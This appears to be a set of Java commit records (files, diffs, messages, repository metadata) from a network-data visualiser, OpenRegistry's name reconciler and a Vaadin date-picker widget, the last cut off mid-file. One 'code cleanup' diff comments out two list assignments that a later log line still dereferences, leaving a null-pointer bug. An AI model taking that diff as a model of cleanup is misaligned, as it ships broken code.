package big.marketing.controller; import java.io.IOException; import java.util.EnumMap; import java.util.List; import java.util.Observable; import org.apache.log4j.Logger; import big.marketing.Settings; import big.marketing.data.DataType; import big.marketing.data.FlowMessage; import big.marketing.data.HealthMessage; import big.marketing.data.IPSMessage; import big.marketing.data.Node; import big.marketing.reader.NetworkReader; import big.marketing.reader.ZipReader; public class DataController extends Observable implements Runnable { // http://docs.oracle.com/javase/7/docs/api/java/util/Observable.html static Logger logger = Logger.getLogger(DataController.class); private GephiController gc; private MongoController mc; // qWindow size in milliseconds, default value 1 hour static int QUERYWINDOW_SIZE = 6000; // qWindow variables store the data returned from mongo private List<HealthMessage> qWindowHealth = null; private List<IPSMessage> qWindowIPS = null; private List<FlowMessage> qWindowFlow = null; private List<Node> network = null; private Node[] highlightedNodes = null; private Node selectedNode = null; private Thread readingThread; public DataController() { loadSettings(); this.mc = MongoController.getInstance(); this.gc = new GephiController(); } public void readData() { readingThread = new Thread(this, "DataReader"); readingThread.start(); } public void run() { // TODO These things would be better to do directly in readers // The readers should independently handle reading and storing to the // database when started from the interface. Every reader should handle // it's own errors NetworkReader nReader = new NetworkReader(this.mc); ZipReader zReader = new ZipReader(this.mc); try { network = nReader.readNetwork(); EnumMap<DataType, Boolean> presentInDatabase = new EnumMap<DataType, Boolean>(DataType.class); for (DataType t : DataType.values()) { presentInDatabase.put(t, mc.isDataInDatabase(t)); } for (int week = 1; week <= 2; week++) { for (DataType t : DataType.values()) { if (!presentInDatabase.get(t)) zReader.read(t, week); } } } catch (IOException err) { logger.error("Error while loading network data.", err); } } /** * Moves QueryWindow to certain position in time and queries data to qWindow * variables from mongo Hides mongo implementation details from views * * @param date in milliseconds marking the center point of the query * @return TODO return some info */ @SuppressWarnings("unchecked") public void moveQueryWindow(int msdate) { int start = msdate - QUERYWINDOW_SIZE / 2, end = msdate + QUERYWINDOW_SIZE / 2; long startTime = System.currentTimeMillis(); qWindowHealth = (List<HealthMessage>) (List<?>) mc.getConstrainedEntries(DataType.HEALTH, "Time", start, end); qWindowIPS = (List<IPSMessage>) (List<?>) mc.getConstrainedEntries(DataType.IPS, "Time", start, end); qWindowFlow = (List<FlowMessage>) (List<?>) mc.getConstrainedEntries(DataType.FLOW, "Time", start, end); logger.info("Moved qWindow to " + msdate + ", Query took " + (System.currentTimeMillis() - startTime) + " ms, Window size: " + QUERYWINDOW_SIZE + " ms, Flow: " + qWindowFlow.size() + " objects, Health: " + qWindowHealth.size() + " objects, IPS: " + qWindowIPS.size() + " objects"); // TODO moveQueryWindow should return some info about the success of the // database query } private void loadSettings() { try { QUERYWINDOW_SIZE = Integer.valueOf(Settings.get("controller.querywindow.size")); } catch (NumberFormatException err) { logger.error("Loading settings failed, number conversion error", err); } } public List<Node> getNetwork() { return network; } public List<HealthMessage> getqWindowHealth() { return qWindowHealth; } public List<IPSMessage> getqWindowIPS() { return qWindowIPS; } public List<FlowMessage> getqWindowFlow() { return qWindowFlow; } public void setHighlightedNodes(Node[] highlightedNodes) { this.highlightedNodes = highlightedNodes; setChanged(); } public void setSelectedNode(Node selectedNode) { this.selectedNode = selectedNode; setChanged(); } public Node[] getHighlightedNodes() { return highlightedNodes; } public Node getSelectedNode() { return selectedNode; } public MongoController getMongoController() { return mc; } public GephiController getGephiController() { return gc; } }
code cleanup
src/big/marketing/controller/DataController.java
code cleanup
<ide><path>rc/big/marketing/controller/DataController.java <ide> long startTime = System.currentTimeMillis(); <ide> <ide> qWindowHealth = (List<HealthMessage>) (List<?>) mc.getConstrainedEntries(DataType.HEALTH, "Time", start, end); <del> qWindowIPS = (List<IPSMessage>) (List<?>) mc.getConstrainedEntries(DataType.IPS, "Time", start, end); <del> qWindowFlow = (List<FlowMessage>) (List<?>) mc.getConstrainedEntries(DataType.FLOW, "Time", start, end); <add> // qWindowIPS = (List<IPSMessage>) (List<?>) mc.getConstrainedEntries(DataType.IPS, "Time", start, end); <add> // qWindowFlow = (List<FlowMessage>) (List<?>) mc.getConstrainedEntries(DataType.FLOW, "Time", start, end); <ide> <ide> logger.info("Moved qWindow to " + msdate + ", Query took " + (System.currentTimeMillis() - startTime) + " ms, Window size: " <ide> + QUERYWINDOW_SIZE + " ms, Flow: " + qWindowFlow.size() + " objects, Health: " + qWindowHealth.size() + " objects, IPS: " <ide> + qWindowIPS.size() + " objects"); <del> // TODO moveQueryWindow should return some info about the success of the <del> // database query <add> // TODO moveQueryWindow should return some info about the success of the database query <ide> } <ide> <ide> private void loadSettings() {
Java
apache-2.0
52f2a9b2a9c2d87d79173735fd01d2c02be4d2f8
0
Rutgers-IDM/openregistry,Unicon/openregistry,Unicon/openregistry,Unicon/openregistry,sheliu/openregistry,Jasig/openregistry,msidd/openregistry,msidd/openregistry,Unicon/openregistry,msidd/openregistry,sheliu/openregistry,Rutgers-IDM/openregistry,Unicon/openregistry,Unicon/openregistry,sheliu/openregistry,Rutgers-IDM/openregistry,Jasig/openregistry,Jasig/openregistry,Jasig/openregistry,msidd/openregistry,sheliu/openregistry,msidd/openregistry,Rutgers-IDM/openregistry,Rutgers-IDM/openregistry,Jasig/openregistry,sheliu/openregistry,Jasig/openregistry,Unicon/openregistry
package org.openregistry.service.reconciliation; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Set; import org.openregistry.core.domain.Name; import org.openregistry.core.domain.Person; import org.openregistry.core.domain.sor.PersonSearch; import org.openregistry.core.repository.PersonRepository; import org.openregistry.core.service.reconciliation.FieldMatch; import org.openregistry.core.service.reconciliation.PersonMatch; import org.openregistry.core.service.reconciliation.Reconciler; import org.openregistry.core.service.reconciliation.ReconciliationResult; import org.openregistry.core.service.reconciliation.ReconciliationResult.ReconciliationType; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Component; /** * Very simplistic Name Reconciler. Just for testing purposes. * * @author steiner * @version $Revision$ $Date$ */ @Component public final class NameReconciler implements Reconciler { private static final long serialVersionUID = -7509304431552307514L; @Autowired(required = true) private PersonRepository personRepository; protected final Logger logger = LoggerFactory.getLogger(getClass()); /* * @see org.openregistry.core.service.reconciliation.Reconciler#reconcile(org.openregistry.core.domain.sor.PersonSearch) */ public ReconciliationResult reconcile(PersonSearch personSearch) { List<PersonMatch> exactMatches = new ArrayList<PersonMatch>(); List<PersonMatch> partialMatches = new ArrayList<PersonMatch>(); Set<? extends Name> names = personSearch.getPerson().getNames(); // TODO deal with multiple names properly logger.info("Reconcile: found " + names.size() + " name(s)"); for(Name name: names) { logger.info("Reconcile: checking name: " + name.getGiven() + " " + name.getFamily()); List<Person> matches = this.personRepository.findByFamilyName(name.getFamily()); logger.info("Reconcile: found " + matches.size() + " possible match(es)"); for(Person match: matches) { if (name.getGiven().equals(match.getOfficialName().getGiven())) { // TODO use all names logger.info("Reconcile: found exact match: " + match.getOfficialName().getGiven() + " " + match.getOfficialName().getFamily()); exactMatches.add(new PersonMatchImpl(match, 100, Collections.<FieldMatch>emptyList())); } else { logger.info("Reconcile: found partial match: " + match.getOfficialName().getGiven() + " " + match.getOfficialName().getFamily()); partialMatches.add(new PersonMatchImpl(match, 50, Collections.<FieldMatch>emptyList())); } } } logger.info("Reconcile: finished matching: " + exactMatches.size() + "," + partialMatches.size()); if (exactMatches.isEmpty() && partialMatches.isEmpty()) { logger.info("Reconcile: returning NONE; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.NONE, Collections.<PersonMatch>emptyList()); } else if (! partialMatches.isEmpty()) { List<PersonMatch> matches = new ArrayList<PersonMatch>(); matches.addAll(exactMatches); matches.addAll(partialMatches); logger.info("Reconcile: returning MAYBE; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.MAYBE, matches); } else if (exactMatches.size() > 1) { logger.info("Reconcile: returning MAYBE; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.MAYBE, exactMatches); } else { logger.info("Reconcile: returning EXACT; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.EXACT, exactMatches); } } }
openregistry-service-impl/src/main/java/org/openregistry/service/reconciliation/NameReconciler.java
package org.openregistry.service.reconciliation; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Set; import org.openregistry.core.domain.Name; import org.openregistry.core.domain.Person; import org.openregistry.core.domain.sor.PersonSearch; import org.openregistry.core.repository.PersonRepository; import org.openregistry.core.service.reconciliation.FieldMatch; import org.openregistry.core.service.reconciliation.PersonMatch; import org.openregistry.core.service.reconciliation.Reconciler; import org.openregistry.core.service.reconciliation.ReconciliationResult; import org.openregistry.core.service.reconciliation.ReconciliationResult.ReconciliationType; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Component; /** * Very simplistic Name Reconciler. Just for testing purposes. * * @author steiner * @version $Revision$ $Date$ */ @Component public final class NameReconciler implements Reconciler { @Autowired(required = true) private PersonRepository personRepository; private List<PersonMatch> exactMatches = new ArrayList<PersonMatch>(); private List<PersonMatch> partialMatches = new ArrayList<PersonMatch>(); protected final Logger logger = LoggerFactory.getLogger(getClass()); /* * @see org.openregistry.core.service.reconciliation.Reconciler#reconcile(org.openregistry.core.domain.sor.PersonSearch) */ public ReconciliationResult reconcile(PersonSearch personSearch) { Set<? extends Name> names = personSearch.getPerson().getNames(); // TODO deal with multiple names properly logger.info("Reconcile: found " + names.size() + " name(s)"); for(Name name: names) { logger.info("Reconcile: checking name: " + name.getGiven() + " " + name.getFamily()); List<Person> matches = this.personRepository.findByFamilyName(name.getFamily()); logger.info("Reconcile: found " + matches.size() + " possible match(es)"); for(Person match: matches) { if (name.getGiven().equals(match.getOfficialName().getGiven())) { // TODO use all names logger.info("Reconcile: found exact match: " + match.getOfficialName().getGiven() + " " + match.getOfficialName().getFamily()); exactMatches.add(new PersonMatchImpl(match, 100, Collections.<FieldMatch>emptyList())); } else { logger.info("Reconcile: found partial match: " + match.getOfficialName().getGiven() + " " + match.getOfficialName().getFamily()); partialMatches.add(new PersonMatchImpl(match, 50, Collections.<FieldMatch>emptyList())); } } } logger.info("Reconcile: finished matching: " + exactMatches.size() + "," + partialMatches.size()); if (exactMatches.isEmpty() && partialMatches.isEmpty()) { logger.info("Reconcile: returning NONE; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.NONE, Collections.<PersonMatch>emptyList()); } else if (! partialMatches.isEmpty()) { List<PersonMatch> matches = new ArrayList<PersonMatch>(); matches.addAll(exactMatches); matches.addAll(partialMatches); logger.info("Reconcile: returning MAYBE; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.MAYBE, matches); } else if (exactMatches.size() > 1) { logger.info("Reconcile: returning MAYBE; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.MAYBE, exactMatches); } else { logger.info("Reconcile: returning EXACT; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.EXACT, exactMatches); } } }
NOJIRA don't reuse match lists git-svn-id: 996c6d7d570f9e8d676b69394667d4ecb3e4cdb3@17698 1580c273-15eb-1042-8a87-dc5d815c88a0
openregistry-service-impl/src/main/java/org/openregistry/service/reconciliation/NameReconciler.java
NOJIRA don't reuse match lists
<ide><path>penregistry-service-impl/src/main/java/org/openregistry/service/reconciliation/NameReconciler.java <ide> @Component <ide> public final class NameReconciler implements Reconciler { <ide> <add> private static final long serialVersionUID = -7509304431552307514L; <add> <ide> @Autowired(required = true) <ide> private PersonRepository personRepository; <del> <del> private List<PersonMatch> exactMatches = new ArrayList<PersonMatch>(); <del> private List<PersonMatch> partialMatches = new ArrayList<PersonMatch>(); <ide> <ide> protected final Logger logger = LoggerFactory.getLogger(getClass()); <ide> <ide> * @see org.openregistry.core.service.reconciliation.Reconciler#reconcile(org.openregistry.core.domain.sor.PersonSearch) <ide> */ <ide> public ReconciliationResult reconcile(PersonSearch personSearch) { <add> List<PersonMatch> exactMatches = new ArrayList<PersonMatch>(); <add> List<PersonMatch> partialMatches = new ArrayList<PersonMatch>(); <add> <ide> Set<? extends Name> names = personSearch.getPerson().getNames(); // TODO deal with multiple names properly <ide> logger.info("Reconcile: found " + names.size() + " name(s)"); <ide> for(Name name: names) {
Java
apache-2.0
34fea19929a7c5f934b1d99adc6075210bb5cc1a
0
fdreyfs/vaadin-tuning-datefield
/* * Copyright (C) 2013 Frederic Dreyfus * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.vaadin.addons.tuningdatefield; import java.lang.reflect.Method; import java.text.DateFormatSymbols; import java.util.Calendar; import java.util.Locale; import org.joda.time.DateTimeConstants; import org.joda.time.Days; import org.joda.time.LocalDate; import org.joda.time.Months; import org.joda.time.YearMonth; import org.joda.time.format.DateTimeFormat; import org.joda.time.format.DateTimeFormatter; import org.vaadin.addons.tuningdatefield.event.DateChangeEvent; import org.vaadin.addons.tuningdatefield.event.DateChangeListener; import org.vaadin.addons.tuningdatefield.event.MonthChangeEvent; import org.vaadin.addons.tuningdatefield.event.MonthChangeListener; import org.vaadin.addons.tuningdatefield.event.YearChangeEvent; import org.vaadin.addons.tuningdatefield.event.YearChangeListener; import org.vaadin.addons.tuningdatefield.widgetset.client.TuningDateFieldRpc; import org.vaadin.addons.tuningdatefield.widgetset.client.TuningDateFieldState; import org.vaadin.addons.tuningdatefield.widgetset.client.ui.calendar.CalendarItem; import org.vaadin.addons.tuningdatefield.widgetset.client.ui.calendar.CalendarResolution; import com.google.gwt.thirdparty.guava.common.base.Objects; import com.vaadin.data.Property; import com.vaadin.data.util.converter.Converter; import com.vaadin.data.util.converter.Converter.ConversionException; import com.vaadin.data.validator.RangeValidator; import com.vaadin.ui.AbstractField; import com.vaadin.ui.TextField; import com.vaadin.util.ReflectTools; /** * A date picker with a Joda {@link LocalDate} as model.<br /> * <p> * Usage:<br /> * * <pre> * TuningDateField tuningDateField = new TuningDateField(); * tuningDateField.setLocale(Locale.US); // optional * // A null range means no limit * tuningDateField.setDateRange(new LocalDate(2013, MAY, 10), new LocalDate(2013, JUNE, 5), &quot;The date must be between &quot; * + startDate + &quot; and &quot; + endDate); * tuningDateField.setLocalDate(new LocalDate(2013, MAY, 15)); * tuningDateField.setCellItemCustomizer(myTuningDateFieldCustomizer); // To customize cells of calendar * </pre> * * </p> * * <p> * The {@link TuningDateField} displays a {@link TextField} with proper LocalDate converter and a toggle button to * display a calendar.<br /> * The default converter will use a short format . You can set your own formatter using * {@link #setDateTimeFormatter(DateTimeFormatter)}. * </p> * <p> * To acess the {@link LocalDate} value of this field use the {@link #getLocalDate()} method which will return * <code>null</code> if the text value is null or if it is invalid. * </p> * * <p> * You can customize cells of the calendar using the {@link CellItemCustomizer} and its convenient default * {@link CellItemCustomizerAdapter}. <br /> * Example of a customizer which will apply even style to even days and odd styles for odd days in the calendar with * {@link CalendarResolution#DAY} resolution.<br /> * It will also disable the 25th of December 2013: * * <pre> * public class MyTuningDateFieldCustomizer extends TuningDateFieldCustomizerAdapter { * * &#064;Override * public String getStyle(LocalDate date, TuningDateField calendar) { * return date.getDayOfMonth() % 2 == 0 ? &quot;even&quot; : &quot;odd&quot;; * } * * &#064;Override * public boolean isEnabled(LocalDate date, TuningDateField calendar) { * if (date.equals(new LocalDate(2013, DECEMBER, 25))) { * return false; * } else { * return true; * } * } * } * </pre> * * </p> * * <p> * The primary stylename of the calendar is </code>tuning-datefield-calendar</code><br /> * <br /> * * CSS styles for calendar {@link CalendarResolution#DAY} : * <ul> * <li>today : if cell represents the current day</li> * <li>selected : if cell represents the selected day</li> * <li>currentmonth : if cell represents a day on current calendar month</li> * <li>previousmonth : if cell represents a day on previous calendar month</li> * <li>nextmonth : if cell represents a day on next calendar month</li> * <li>weekend : if cell represents a week-end</li> * <li>enabled : if cell is enabled</li> * <li>disabled : if cell is disabled</li> * </ul> * * CSS styles for calendar {@link CalendarResolution#MONTH} : * <ul> * <li>selected : if cell represents the selected month</li> * <li>currentmonth : if cell represents a day on current calendar month</li> * <li>enabled : if cell is enabled</li> * <li>disabled : if cell is disabled</li> * </ul> * * CSS styles for calendar {@link CalendarResolution#YEAR} : * <ul> * <li>selected : if cell represents the selected month</li> * <li>currentyear : if cell represents a day on current calendar month</li> * <li>enabled : if cell is enabled</li> * <li>disabled : if cell is disabled</li> * </ul> * * </p> * * * @author Frederic.Dreyfus * */ public class TuningDateField extends AbstractField<String> { private static final long serialVersionUID = 5261965803349750329L; /** * The cell item customizer which allows to customize calendar cells. */ private CellItemCustomizer cellItemCustomizer; /** * The date range validator if a range is defined * * @see #setDateRange(LocalDate, LocalDate, String) */ private RangeValidator<LocalDate> dateRangeValidator; // private boolean dayPicker = true; private CalendarResolution calendarResolution = CalendarResolution.DAY; /** * A dateTimeFormatter for parsing/printing dates. A default {@link DateTimeFormatter} is defined with short format * for current locale. This can be overriden using {@link #setDateTimeFormatter(DateTimeFormatter)} */ private DateTimeFormatter dateTimeFormatter; // True if the dateTimeFormatter is the default one and not a user defined private boolean defaultDateTimeFormatter = true; // Internal uses : the following 4 values are computed once at init and if the locale changes. private String[] monthTexts; // Jan, Feb, Mar private String[] shortMonthTexts; // Jan, Feb, Mar private String[] weekDayNames; // Sun, Mon, Tue, ... private int firstDayOfWeek; // 1 in France (monday), 7 in the US (sunday) private int lastDayOfWeek; // 7 in France (sunday), 6 in the US (saturday) /** * True to disable weekends. * * @see #setWeekendDisabled(boolean) */ private boolean weekendDisabled = true; /** * True to enable/disabled controls * * @see #setControlsEnabled(boolean) */ private boolean controlsEnabled = true; // Internal use : the month currently displayed in the calendar private YearMonth yearMonthDisplayed; // Internal use : the year currently displayed in the calendar private int yearDisplayed; // Internal use private boolean calendarOpen; public TuningDateField() { init(); setValue(null); } public TuningDateField(String caption) { this(); setCaption(caption); init(); } public TuningDateField(Property<?> dataSource) { this(null, dataSource); } public TuningDateField(String caption, Property<?> dataSource) { init(); setCaption(caption); setPropertyDataSource(dataSource); } public TuningDateField(String caption, LocalDate value) { init(); setCaption(caption); setLocalDate(value); } private void init() { setupLocaleBasedStaticData(getLocale()); initConverter(); setYearMonthDisplayed(YearMonth.now()); registerTuningDateFieldRpc(); addValueChangeListener(new ValueChangeListener() { private static final long serialVersionUID = -8632906562585439165L; @Override public void valueChange(com.vaadin.data.Property.ValueChangeEvent event) { fireEvent(new DateChangeEvent(TuningDateField.this, (LocalDate) getConvertedValue())); } }); } /** * Initialize the {@link LocalDate} converter for the text field. */ private void initConverter() { Converter<String, LocalDate> converter = new Converter<String, LocalDate>() { private static final long serialVersionUID = -2161506497954814519L; @Override public LocalDate convertToModel(String value, Class<? extends LocalDate> targetType, Locale locale) throws com.vaadin.data.util.converter.Converter.ConversionException { if (value == null) { return null; } LocalDate modelValue = null; try { modelValue = dateTimeFormatter.parseLocalDate(value); } catch (IllegalArgumentException e) { throw new ConversionException("Cannot convert to model"); } return modelValue; } @Override public String convertToPresentation(LocalDate value, Class<? extends String> targetType, Locale locale) throws com.vaadin.data.util.converter.Converter.ConversionException { if (value == null) { return null; } String presentationValue = null; try { presentationValue = dateTimeFormatter.print(value); } catch (IllegalArgumentException e) { throw new ConversionException("Cannot convert to presentation"); } return presentationValue; } @Override public Class<LocalDate> getModelType() { return LocalDate.class; } @Override public Class<String> getPresentationType() { return String.class; } }; setConverter(converter); } private void registerTuningDateFieldRpc() { registerRpc(new TuningDateFieldRpc() { private static final long serialVersionUID = 3572898507878457932L; @Override public void onCalendarOpen() { TuningDateField.this.onCalendarOpen(); markAsDirty(); } @Override public void onCalendarClosed() { calendarOpen = false; markAsDirty(); } @Override public void calendarItemClicked(Integer relativeDateIndex) { onCalendarItemClicked(relativeDateIndex); } @Override public void dateTextChanged(String dateText) { setValue(dateText); } @Override public void previousControlClicked() { if (controlsEnabled) { goToPreviousCalendarPage(); } else { // wtf ? should never happen } } @Override public void nextControlClicked() { if (controlsEnabled) { goToNextCalendarPage(); } else { // wtf ? should never happen } } @Override public void resolutionControlClicked() { if (controlsEnabled) { swithToHigherCalendarResolution(); } else { // wtf ? should never happen } } }); } public void setLocale(Locale locale) { super.setLocale(locale); // reinitialize static data based on locale (monthText, day names, etc...) boolean localeModified = Objects.equal(getLocale(), locale); if (localeModified) { setupLocaleBasedStaticData(locale); } } private void setupLocaleBasedStaticData(Locale locale) { if (locale == null) { locale = Locale.getDefault(); } if (defaultDateTimeFormatter) { dateTimeFormatter = DateTimeFormat.shortDate().withLocale(locale); } monthTexts = new DateFormatSymbols(locale).getMonths(); shortMonthTexts = new DateFormatSymbols(locale).getShortMonths(); firstDayOfWeek = getFirstDayOfWeek(locale); lastDayOfWeek = getLastDayOfWeek(locale); weekDayNames = getWeekDayNames(locale); } /** * Sets the date range of this tuningDateField * * @param startDate * the start date (included) * @param endDate * the end date (included) */ public void setDateRange(LocalDate startDate, LocalDate endDate, String errorMessage) { if (endDate.isBefore(startDate)) { throw new IllegalArgumentException("Cannot have a date range with end date " + endDate + " before start date " + startDate); } // set validator for date range if (dateRangeValidator != null) { removeValidator(dateRangeValidator); } dateRangeValidator = new RangeValidator<LocalDate>(errorMessage, LocalDate.class, startDate, endDate); addValidator(dateRangeValidator); markAsDirty(); } /** * Returns <code>true</code> if : * <ol> * <li>date is in range</li> * <li>date is not a week-end, or if it is then week-ends are not disabled</li> * <li>date is not disabled by {@link CellItemCustomizer}</li> * </ol> * * @param date * the date * @return <code>true</code> if date is enabled, else returns <code>false</code> */ protected boolean isDateEnabled(LocalDate date) { boolean enabled = false; enabled = isDateInRange(date); if (!enabled) { return enabled; } if (isWeekend(date) && isWeekendDisabled()) { return false; } if (enabled && cellItemCustomizer != null) { enabled = cellItemCustomizer.isEnabled(date, this); } return enabled; } /** * Returns <code>true</code> if date is in range, else returns <code>false</code> * * @param date * the date. * @return <code>true</code> if date is in range, else returns <code>false</code> */ private boolean isDateInRange(LocalDate date) { if (dateRangeValidator == null) { return true; } else { return dateRangeValidator.isValid(date); } } /** * <code>true</code> if date is a week-end, else returns <code>false</code>. <br /> * Override this method for custom week-ends days. * * @param date * the date * @return <code>true</code> if date is a week-end, else returns <code>false</code> */ protected boolean isWeekend(LocalDate date) { return date.getDayOfWeek() >= DateTimeConstants.SATURDAY; } @Override public TuningDateFieldState getState() { return (TuningDateFieldState) super.getState(); } @Override public void beforeClientResponse(boolean initial) { super.beforeClientResponse(initial); // For days of first week that are in previous month // Get first day of week of last week's previous month if (getValue() != null) { getState().setDisplayedDateText(getValue()); } getState().setCalendarOpen(calendarOpen); // We send calendar state only if it's open if (calendarOpen) { getState().setControlsEnabled(controlsEnabled); getState().setCalendarResolution(calendarResolution); if (calendarResolution.equals(CalendarResolution.DAY)) { YearMonth yearMonthDisplayed = getYearMonthDisplayed(); String displayedMonthText = monthTexts[yearMonthDisplayed.getMonthOfYear() - 1]; getState().setCalendarResolutionText(displayedMonthText + " " + yearMonthDisplayed.getYear()); getState().setWeekHeaderNames(weekDayNames); getState().setCalendarItems(buildDayItems()); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { getState().setCalendarItems(buildMonthItems()); getState().setCalendarResolutionText(Integer.toString(yearMonthDisplayed.getYear())); } else if (calendarResolution.equals(CalendarResolution.YEAR)) { getState().setCalendarItems(buildYearItems()); getState().setCalendarResolutionText(getCalendarFirstYear() + " - " + getCalendarLastYear()); } } } private CalendarItem[] buildDayItems() { LocalDate calendarFirstDay = getCalendarFirstDay(); LocalDate calendarLastDay = getCalendarLastDay(); LocalDate firstDayOfMonth = yearMonthDisplayed.toLocalDate(1); LocalDate lastDayOfMonth = yearMonthDisplayed.toLocalDate(1).dayOfMonth().withMaximumValue(); LocalDate today = LocalDate.now(); int numberOfDays = Days.daysBetween(calendarFirstDay, calendarLastDay).getDays() + 1; LocalDate date = calendarFirstDay; CalendarItem[] calendarItems = new CalendarItem[numberOfDays]; LocalDate currentValue = getLocalDate(); for (int i = 0; i < numberOfDays; i++, date = date.plusDays(1)) { calendarItems[i] = new CalendarItem(); calendarItems[i].setIndex(i); calendarItems[i].setRelativeDateIndex(date.getDayOfMonth()); calendarItems[i].setText(Integer.toString(date.getDayOfMonth())); StringBuilder style = new StringBuilder(); if (date.equals(today)) { style.append("today "); } if (currentValue != null && date.equals(currentValue)) { style.append("selected "); } if (date.isBefore(firstDayOfMonth)) { style.append("previousmonth "); calendarItems[i].setEnabled(false); } else if (date.isAfter(lastDayOfMonth)) { style.append("nextmonth "); calendarItems[i].setEnabled(false); } else { style.append("currentmonth "); calendarItems[i].setEnabled(true); } if (isWeekend(date)) { style.append("weekend "); } if (cellItemCustomizer != null) { String generatedStyle = cellItemCustomizer.getStyle(date, this); if (generatedStyle != null) { style.append(generatedStyle); style.append(" "); } String tooltip = cellItemCustomizer.getTooltip(date, this); if (tooltip != null) { calendarItems[i].setTooltip(tooltip); } } if (isDateEnabled(date)) { calendarItems[i].setEnabled(true); } else { calendarItems[i].setEnabled(false); } String computedStyle = style.toString(); if (!computedStyle.isEmpty()) { calendarItems[i].setStyle(computedStyle); } } return calendarItems; } private CalendarItem[] buildMonthItems() { YearMonth calendarFirstMonth = getCalendarFirstMonth(); YearMonth calendarLastMonth = getCalendarLastMonth(); YearMonth currentMonth = YearMonth.now(); int numberOfMonths = Months.monthsBetween(calendarFirstMonth, calendarLastMonth).getMonths() + 1; CalendarItem[] calendarItems = new CalendarItem[numberOfMonths]; YearMonth month = calendarFirstMonth; LocalDate currentValue = getLocalDate(); YearMonth currentYearMonthValue = currentValue == null ? null : new YearMonth(currentValue.getYear(), currentValue.getMonthOfYear()); for (int i = 0; i < numberOfMonths; i++, month = month.plusMonths(1)) { calendarItems[i] = new CalendarItem(); calendarItems[i].setIndex(i); calendarItems[i].setRelativeDateIndex(month.getMonthOfYear()); calendarItems[i].setEnabled(true); // By default StringBuilder style = new StringBuilder(""); if (month.equals(currentMonth)) { style.append("currentmonth "); } if (currentYearMonthValue != null && month.equals(currentYearMonthValue)) { style.append("selected "); } if (cellItemCustomizer != null) { String generatedStyle = cellItemCustomizer.getStyle(month, this); if (generatedStyle != null) { style.append(generatedStyle); style.append(" "); } String tooltip = cellItemCustomizer.getTooltip(month, this); if (tooltip != null) { calendarItems[i].setTooltip(tooltip); } } if (isMonthEnabled(month)) { calendarItems[i].setEnabled(true); } String computedStyle = style.toString(); if (!computedStyle.isEmpty()) { calendarItems[i].setStyle(computedStyle); } calendarItems[i].setText(shortMonthTexts[i]); } return calendarItems; } private CalendarItem[] buildYearItems() { int calendarFirstYear = getCalendarFirstYear(); int calendarLastYear = getCalendarLastYear(); int currentYear = YearMonth.now().getYear(); int numberOfYears = calendarLastYear - calendarFirstYear + 1; CalendarItem[] calendarItems = new CalendarItem[numberOfYears]; int year = calendarFirstYear; LocalDate currentValue = getLocalDate(); Integer currentYearValue = currentValue == null ? null : currentValue.getYear(); for (int i = 0; i < numberOfYears; i++, year++) { calendarItems[i] = new CalendarItem(); calendarItems[i].setIndex(i); calendarItems[i].setRelativeDateIndex(year); calendarItems[i].setEnabled(true); StringBuilder style = new StringBuilder(""); if (year == currentYear) { style.append("currentyear "); } if (currentYearValue != null && year == currentYearValue) { style.append("selected "); } if (isYearEnabled(year)) { calendarItems[i].setEnabled(true); } if (cellItemCustomizer != null) { String generatedStyle = cellItemCustomizer.getStyle(year, this); if (generatedStyle != null) { style.append(generatedStyle); style.append(" "); } String tooltip = cellItemCustomizer.getTooltip(year, this); if (tooltip != null) { calendarItems[i].setTooltip(tooltip); } } String computedStyle = style.toString(); if (!computedStyle.isEmpty()) { calendarItems[i].setStyle(computedStyle); } calendarItems[i].setText(Integer.toString(year)); } return calendarItems; } /** * Sets the localDate value of this field. * * @param localDate * the localDate */ public void setLocalDate(LocalDate localDate) { setConvertedValue(localDate); } /** * As the value of the field is a String, the representation may be corrupted to be parsed into a {@link LocalDate}. * In that case we return <code>null</code>. * * @return the localDate value of this field if defined and valid, else returns <code>null</code>. */ public LocalDate getLocalDate() { try { return (LocalDate) getConvertedValue(); } catch (ConversionException e) { // In that case the value is invalid return null; } } /** * @return the first day of the calendar. As there are 7 columns displayed, if the first day of month is not in the * first column, we fill previous column items with days of previous month. */ private LocalDate getCalendarFirstDay() { LocalDate firstDayOfMonth = yearMonthDisplayed.toLocalDate(1); int calendarFirstDayOfWeek = firstDayOfWeek; int numberOfDaysSinceFirstDayOfWeek = (firstDayOfMonth.getDayOfWeek() - calendarFirstDayOfWeek + 7) % 7; return firstDayOfMonth.minusDays(numberOfDaysSinceFirstDayOfWeek); } /** * @return the last day of the calendar. As there are 7 columns displayed, if the last day of month is not in the * last column, we fill next column items with days of next month. */ private LocalDate getCalendarLastDay() { LocalDate lastDayOfMonth = yearMonthDisplayed.toLocalDate(1).dayOfMonth().withMaximumValue(); int calendarLastDayOfWeek = lastDayOfWeek; int numberOfDaysUntilLastDayOfWeek = (calendarLastDayOfWeek - lastDayOfMonth.getDayOfWeek() + 7) % 7; return lastDayOfMonth.plusDays(numberOfDaysUntilLastDayOfWeek); } private YearMonth getCalendarFirstMonth() { return new YearMonth(yearDisplayed, 1); } private YearMonth getCalendarLastMonth() { return new YearMonth(yearDisplayed, 12); } /** * If current year displayed is 1954, the range is 1949-1960 */ 